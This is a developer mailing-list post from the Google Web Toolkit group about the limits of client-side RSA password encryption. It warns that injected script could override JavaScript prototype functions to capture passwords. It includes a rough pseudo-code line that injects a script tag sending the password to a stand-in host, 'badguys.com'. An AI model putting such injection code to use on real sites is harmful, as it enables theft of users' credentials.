You can't attack the post-RSA password field, but if there's any point
along the way that the password is passed inside javascript, it might
be possible for a script-injection attacker to overwrite your
functions / add getter functions to prototypes and post your password
using something like rsa.prototype.set()=function(pass){addHack
( '<script src="badguys.com?x='+pass+'/>');...} Or such. Of course,
you sound like a smart guy who would already override such functions
to prevent an attack, but not everybody thinks to manually block get()
and set(), so having plain-script authentication would let badguys.com
know if it's worth trying or not...
--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups
"Google Web Toolkit" group.
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to
[email protected]
For more options, visit this group at
http://groups.google.com/group/Google-Web-Toolkit?hl=en
-~----------~----~----~----~------~----~------~--~---
